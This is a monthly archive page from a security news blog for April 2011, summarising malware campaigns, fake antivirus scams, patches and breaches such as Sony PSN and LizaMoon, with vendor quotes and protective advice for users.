April 2011 - Posts
It is becoming more critical to protect mobile phone security and ESET (a leading security and AV firm) has just developed a new beta version as noted below
ESET - Android Mobile Security product
http://blog.eset.com/2011/04/28/eset-mobile-security-beta-for-android-is-here
QUOTE: As I have blogged about the Android platform a recurring comment has been “When will ESET have protection for my Android?” Well, I still don’t know when it will be available for sale, but for those who understand the risks involved with running beta software, have backed up all of their data on their Android devices and want to give it a spin, you can download the beta at
http://www.eset.com/us/beta/mobile-security-for-android
Also at that site is a link to provide feedback and bug reports! By the way, for those of you like me who have a CDMA device (Verizon, Sprint, etc.) the SIM features do not work exactly right yet.
Major news stories like the Royal Wedding are often used to trick users into selecting links that will automatically download malware. Please be careful on anything you select.
President Obama Birth Certificate and FAKEAV attacks
http://sunbeltblog.blogspot.com/2011/04/obama-birth-certificates-and-rogue-av.html
QUOTE: You probably saw that whole "Obama birth certificate" thing yesterday. You're also aware this means hunting around for pictures of his birth certificate is going to result in Rogue AV files popping up. Big news stories will always result in a wave of Rogue AV in both regular search and image links, so be careful where you click (as much as you possibly can, at any rate).
A workaround has been published for this false positive affecting SAP connectivity software.
McAfee Virus Scan DAT 6329 False Positive
https://kc.mcafee.com/corporate/index?page=content&id=KB71739
http://isc.sans.edu/diary/McAfee+VirusScan+Enterprise+False+Positive+Detection+Generic+dx+yxk+in+DAT+6329/10783
QUOTE: McAfee Labs have issued an alert that McAfee VirusScan DAT file 6329 is returning a false positive for spsgui.exe. This is impacting SAP telephone connectivity functionality
McAfee have a work around for the issue documented in KB71739
https://kc.mcafee.com/corporate/index?page=content&id=KB71739
Microsoft released a special Malicious Software Removal Tool update on Tuesday to better eradicate the Afcore botnet. This is described below:
MSRT - Second release during April 2011 to fight Afcore botnet
http://blogs.pcmag.com/securitywatch/2011/04/microsoft_issues_extra_malware.php
http://blogs.technet.com/b/mmpc/archive/2011/04/26/a-second-msrt-release-in-april.aspx
http://support.microsoft.com/kb/894199
QUOTE: The 4th Tuesday of the month is also a Patch Tuesday, though lesser-known. Microsoft issues non-security updates on almost every 4th Tuesday of the month, but this month has a surprise addition: An extra edition of the Malicious Software Removal Tool. The updates released today fix a variety of problems and Microsoft is, as typical, vague about them. One addresses application compatibility problems; two are "reliability updates"; and two more "resolve issues" in Windows.
The last update is the MSRT. Microsoft always releases an MSRT on the first Patch Tuesday of the month, but this may be the first time they have released a second. This version is part of an ongoing effort to take down the Afcore botnet. Win32/Afcore's authors released new variants at about the time of the last MSRT release 2 weeks ago. The new MSRT also includes updates for other malware families.
Sony is currently evaluating it's PSN services to determine the scope of a recent security breach by unauthorized users.
SONY PSN Service Outage
http://blog.eu.playstation.com/2011/04/26/psnqriocity-service-update/
http://blog.eu.playstation.com/2011/04/27/clarifying-a-few-psn-points/
SONY PSN Blog to track future developments
http://blog.eu.playstation.com/
SONY PSN Service Outage FAQ
http://faq.en.playstation.com/cgi-bin/scee_gb.cfg/php/enduser/std_adp.php?locale=en_GB&p_faqid=5593
QUOTE: Sony takes information protection very seriously and will continue to work to ensure that additional measures are taken to protect personally identifiable information. Providing quality and secure entertainment services to our customers is our utmost priority. Please check www.eu.playstation.com/psnoutage should you have any additional questions.
Trend Micro reports that a new application called "Facebook Messenger" is being presented to users. Please avoid this malicious attack and be careful of any link or application presented to you in this social networking environment.
Facebook Events, Credits, and Passwords Being Used for Attacks
http://blog.trendmicro.com/facebook-events-credits-and-passwords-being-used-for-attacks/
QUOTE: Facebook has expanded its range of service offerings, making the site so much more than a place where users can interact with one another. It has been said several times that Facebook is bound to replace email as a means of communication, as it provides a more convenient way for users to send messages. This convenience, however, was also leveraged by cybercriminals in a recent spam run wherein users were urged to download an application called Facebook Messenger. This would supposedly make it easier for them to access messages sent to their Facebook accounts.
The attack starts with spammed messages that look like a Facebook notification. The email message alerts the users about a message that has been sent to their Facebook accounts. It tells the users to click a link to view the said message. Clicking the message, however, displays a download page for an application called Facebook Messenger.
The downloaded file named FacebookMessengerSetup.exe is malicious and detected as BKDR_QUEJOB.EVL. BKDR_QUEJOB.EVL opens TCP port 1098 to listen for commands sent by a malicious attacker. The nature of the commands may include updating the malicious file, downloading and executing other malicious files, and starting certain processes. It also queries the system for information such as installed antivirus products and OS version then sends the data it gathers to a certain SMTP.
Trend Micro documents that DLL based FAKEAV attacks are circulating in the wild and that these infected systems are challenging to clean.
Fourth Generation FAKEAV DLL Based attacks return in the wild
http://blog.trendmicro.com/dll-based-fakeav-returns-in-the-wild/
QUOTE: One of the early generations listed in the paper can be recalled as the DLL-based FAKEAV (4th Generation) — a FAKEAV group that uses a DLL file to perform all the malicious routines, primarily to avoid being terminated easily. A few months ago, however, we saw this particular generation again making its rounds in the wild, one of which we detect as TROJ_FAKEAV.BTV
Trend Micro - Reasearch report on FAKEAV Threat
http://about-threats.trendmicro.com/RelatedThreats.aspx?language=us&name=The+Dangers+Rogue+Antivirus+Threats+Pose
Sunbelt documents a fake blog site related to the Royal Wedding is actively loading FAKE AV attacks.
Fake Blog for Kate Middleton offers Fake AV malware
http://sunbeltblog.blogspot.com/2011/04/kate-middleton-has-blog-and-some-fake.html
QUOTE: When she isn't waving at babies, mingling with the commoners or appearing on Tumblrs she likes to set down some thoughts on her blog. She also wants you to check out her movie clip. Unfortunately, this movie clip can't be viewed unless you update your version of Flash. Alarm bells ringing yet? I'm not entirely convinced legit installs of Adobe Flash Player come from this inappropriate site, but in the mad dash to see some rich people larking about with money you'll actually end up with AntiVirus AntiSpyware 2011 on your computer.
Microsoft recently updated procedures for submitting suspicious entries for evaluation as follows:
Microsoft - How to submit suspicious malware entries
http://support.microsoft.com/kb/939288/en-us?sd=rss&spid=12632
QUOTE: When you suspect that a file or a program is malicious, you can send the file to the Microsoft Research and Response team for analysis. Malicious files or programs (malware) may include viruses, spyware, worms, and adware. You can use one of the following methods to send malware files to Microsoft for analysis:
* Web-based submission
* Submission by Microsoft Customer Support Services
* Prompted Submission
SQL Injection attacks are a method where attackers can seed malware on a vulnerable site that may not be programmed with effective controls. Sometimes input strings can be manipulated allowing unauthorized objects to be written to a public area on the server. These objects can then be scripted in attacks so that users are redirected unknowingly to other malicious websites. Corporations can address this will tools that identify vulnerable sites and having their developers strength controls to prevent automated attacks and seeding of malware.
SQL Injection Attacks - Corporate Need to address weaknesses
http://isc.sans.edu/diary.html?storyid=10735
QUOTE: SQL injection vulnerabilities have really been around for ages – the first reference I can remember of was Rain Forest Puppy’s article for Phrack 54 “NT Web Technology Vulnerabilities” that was published back in 1998 (yes – SQL injection is almost 13 years old!). However, as we can see from the examples that happened recently (and from many other cases – just take a look at the mass SQL injection attacks that are performed automatically by malware these days) SQL injection vulnerabilities are unfortunately here to stay.
So are the bad guys any better? Unfortunately, the answer is YES. When I get my hands on, I always try to analyze server side scripts that the bad guys use – these are usually scripts running on their C&C servers that help them control infected machine, issue and schedule tasks and so on. So, if the bad guys can do it, we should be better to – so please use couple of minutes to educate your developers about the dangers of writing insecure code.
eWeek speculates on 10 reasons Windows 8 may provide improvements over Windows 7
Ten reasons Windows 8 may provide improvements
http://www.eweek.com/c/a/Enterprise-Applications/Microsoft-Windows-8-10-Reasons-It-Will-Shatter-Windows-7-759149/
QUOTE: Windows 8 is just around the corner, and rumors are swirling about the upcoming operating system and what it will feature when it’s likely released next year. Although details are relatively slim for now, one thing is for certain: Windows 8 will be even better than Windows 7.
Ten Possible reasons Windows 8 may provide improvements
1. It improves upon a nice operating system.
2. The security keeps improving.
3. The ARM compatibility is key.
4. An application store, perhaps?
5. Instant-on is what’s needed.
6. It might be more suitable for tablets.
7. Better power consumption
8. What’s with History Vault? (possible improvement to System Restore)
9. A better interface
10. Microsoft’s lesson learned
A new security update for Microsoft Silverlight is available. Please update your system, if you have this installed.
Microsoft Silverlight Update - April 2011
http://isc.sans.edu/diary.html?storyid=10747
QUOTE: Microsoft has issued a security patch for Silverlight KB2526954. It fixes six issues. If you have Microsoft update running, it is ready to install. This is rated as important and will auto install.
Description of the update for Microsoft Silverlight
http://support.microsoft.com/kb/2526954
Microsoft Silverlight Direct download (6MB)
http://go.microsoft.com/fwlink/?LinkID=149156
Sunbelt has issued warnings related to Easter Cards and Royal Wedding links as noted below. Please be careful with anything you select as only one wrong click can mean hours of repair work.
Royal Wedding and Easter Cards used in Fake AV attacks
http://sunbeltblog.blogspot.com/2011/04/fake-av-we-are-not-amused.html
http://sunbeltblog.blogspot.com/2011/04/easter-cards-more-rogue-av.html
QUOTE: The Royal Wedding is going to spring into action on the 29th April, and Fake AV scans are starting to show up in relation to the "Big Day". As a result, you might want to think twice before looking for jellybeans bearing the visage of Kate Middleton or strange turnips that look a bit like the future King of England when held at the right angle. The culprit here is our search engine "friend" from this entry regarding Easter card searches.Rummaging around for Royal Wedding sites will start off well enough, with a collection of normal looking search engine results.
Security experts noted a sudden and unexplained drop in activity for this 8 year old Internet worm during March, but unfortunately this trend was only temporary.
SQL Slammer Worm - Activity increases in April
http://blogs.mcafee.com/mcafee-labs/sql-slammer-worm-regains-momentum
QUOTE: At McAfee Labs every day we monitor millions of intrusion prevention systems (IPS) alerts from our sensors around the world. From these alerts, we often see interesting global data and trends. Recently, ISC noticed a sudden decline of Slammer traffic in the wild, which we also noticed on our sensors.
The infamous Slammer was a rapid-spreading worm that started on January 25, 2003. It targeted Microsoft SQL Server, and the worm traveled over UDP on port 1434, which contributes to its rapid spread. It is incredibly noisy, and it really never went away, even though the worm is eight years old!
To our surprise, the amount of traffic that we detect dropped significantly in early March, and we do not yet know the reason for the decline. What we have noticed, however, was that alerts for Slammer started to reappear early this month.
Users should avoid e-commerce or banking transactions by smart phone where possible. Smart phone software should be kept up-to-date as security patches emerge. Also, always be careful of all applications you request and install as there are a few malicious applications circulating.
Mobile Phone Security - Advice from a Professional Hacker
http://www.kiplinger.com/columns/kiptips/archives/smart-phone-safety-tips-from-a-professional-hacker.html
QUOTE: Smart phones make it so easy to do many daily tasks -- from checking e-mail to shopping to banking. But they also make you easy prey for scammers and identity thieves. "It is very difficult to have any protection on your phone," says Dave Aitel, whose company creates penetration testing products (i.e. hacking tools). The company, Immunity, developed a tool that can easily hack into Google Android phones, Aitel says. To be clear, it was created to test mobile security, not to be sold to people who want to tap into others' phones. Nonetheless, the tool shows how vulnerable these phones are to hackers.
Please be careful as several security firms are warning users to be careful with email and web searches related to this upcoming event.
Royal Wedding spam, scams, and malware
http://sunbeltblog.blogspot.com/2011/04/collection-of-royal-wedding-fakeouts.html
http://www.theregister.co.uk/2011/04/21/royal_wedding_scareware_scam/
http://blog.eset.com/2011/04/20/i-take-you-xpantispyware-to-be-my
QUOTE: One of the most common ways to propagate malware through social engineering is to piggyback it on some attention-catching news event. This can be carried out using a variety of techniques and is certainly nothing new. One infamous example from 2007 was Win32/Nuwar (a/k/a the Storm Worm), which distributed through spam emails with current and/or sensational subjects.
Another one which is current these days is the upcoming British royal wedding. When searching keywords relating to this event (e.g., "middleton wedding dress idea") in your search engine, malicious links are among the top results. And the category of malware which sits behind them hardly comes as a surprise – rogue anti-virus apps.
The Patch Tuesday updates installed successfully on both work PCs and no issues have been discovered in early testing. This is a large group of updates (76MB) including Office 2010 and Framework. These updates take several minutes to update. The Framework update is lengthy and may even seem to hang, so users should be patient. It will probably take about 20-30 minutes to install and a reboot should be performed as prompted so that all changes become properly effective.
Microsoft Security Bulletins - April 2011
http://www.microsoft.com/technet/security/bulletin/MS11-apr.mspx
ISC provides excellent summary (two bulletins are rated PATCH NOW)
http://isc.sans.edu/diary/April+2011+Microsoft+Black+Tuesday+Summary/10693
The LizaMoon attack continues to infect thousands of vulnerable websites. While some technical articles have published alarming statistics that over-inflate total infections, this attack continues to spread and users should exercise caution with web search results, Facebook links, or email links.
LizaMoon Mass SQL Injection Attack Escalates Out of Control
http://blogs.pcmag.com/securitywatch/2011/04/many_web_sites_compromised_in.php
LizaMoon - Excellent update and FAQ
http://community.websense.com/blogs/securitylabs/archive/2011/03/31/update-on-lizamoon-mass-injection.aspx
QUOTE: The LizaMoon mass-injection campaign is still ongoing and more than 500,000 pages have a script link to lizamoon.com according to preliminary Google Search results. We have also been able to identify several other URLs that are injected in the exact same way, so the attack is even bigger than we originally thought. All in all, a search on Google returns more than 1,500,000 results that have a link with the same URL structure as the initial attack.
What's the deal with the Lizamoon SQL injection?
http://nakedsecurity.sophos.com/2011/04/01/lizamoon-sql-injection/
QUOTE: The script that is loaded from the compromised web pages redirects the user to a malicious site. Ultimately, the attack is intended to infect users with fake AV (scareware). The distribution sites used typically use the ".cc" (Cocos Islands) or ".in" (India) TLDs. This frightening volume may be a little misleading, since the total is inflated by occurrences of the following HTML within the compromised web pages. As you can see, the injected code has been escaped in some cases, rendering the injection harmless.
It appears that multiple botnets may have been impacted by the recent raid to stop Rustock which impacted over 1 million users.
Harning Botnet was also shutdown along with Rustock
http://www.eweek.com/c/a/Security/Harnig-Malware-Botnet-Also-Shutdown-After-Rustock-Raid-723294/
QUOTE: Rustock is not the only botnet that has stopped operations. The Harnig botnet, also known as Piptea, also went offline at about the same time. On the very day that law enforcement authorities, with Microsoft’s help, were raiding Rustock’s command-and-control servers, the servers belonging to the Harnig botnet–also known as Piptea–stopped responding, according to Atif Mushtaq, a security research engineer at FireEye. Rustock used to be spread by Harnig, suggesting some kind of a relationship between the two botnets, Mustaq wrote on the company’s Malware Intelligence Lab March 22.
Facebook recently started allowing secure connections and HTTPS based controls are gradually improving
Facebook - HTTPS based security improvements
http://www.f-secure.com/weblog/archives/00002131.html
QUOTE: There's been some encouraging progress since then, and this is now what happens when a non-HTTPS application is accessed. So at least the setting is persistent. Hopefully the feature will be more dynamic in the near future. If you have a Facebook account, and want to update your settings for HTTPS, you'll find the option under Account Security.
More Posts
Next page »